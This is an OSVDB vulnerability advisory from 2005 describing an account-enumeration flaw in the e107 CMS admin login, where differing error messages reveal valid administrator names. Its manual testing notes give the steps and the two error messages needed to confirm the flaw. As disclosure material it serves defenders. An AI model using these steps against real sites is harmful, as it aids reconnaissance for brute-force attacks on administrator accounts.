e107 admin.php Administrator Account Enumeration

2005-06-12T08:07:15
ID OSVDB:17569
Type osvdb
Reporter Marc Ruef(marc.ruef@computec.ch)
Modified 2005-06-12T08:07:15

Description

Vulnerability Description

e107 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an attacker attempts to login with an administrator username. The resulting error message is different for valid vs invalid accounts allowing the attacker to verify legitimate administrator accounts. This can be used to launch more focused attacks such as brute force attempts.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

e107 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an attacker attempts to login with an administrator username. The resulting error message is different for valid vs invalid accounts allowing the attacker to verify legitimate administrator accounts. This can be used to launch more focused attacks such as brute force attempts.

Manual Testing Notes

Visit http://<server>/<e107_path>/e107_admin/admin.php and enter an invalid administrator name and no password. Try again and enter a known valid administrator name and no password. The error response in the first case is "Administrator name not found in database", in the case of a valid administrator account the response is "Incorrect password".

References:

Vendor URL: http://www.e107.org Secunia Advisory ID:15733 Related OSVDB ID: 17570 Related OSVDB ID: 17571 Related OSVDB ID: 17572 Related OSVDB ID: 17573 Nessus Plugin ID:18222 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0141.html Bugtraq ID: 13974